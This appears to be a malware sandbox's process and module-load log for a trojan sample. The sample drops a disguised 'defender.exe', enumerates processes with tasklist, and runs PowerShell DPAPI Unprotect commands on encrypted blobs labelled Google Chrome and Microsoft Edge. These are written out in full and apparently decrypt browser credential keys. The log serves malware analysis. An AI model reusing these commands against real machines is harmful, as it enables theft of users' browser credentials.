[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\defender" --app-path="C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1722781275767759 --launch-time-ticks=4443586976 --mojo-platform-channel-handle=2360 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: windows.globalization.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: msspellcheckingfacility.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeSection loaded: directmanipulation.dllJump to behavior
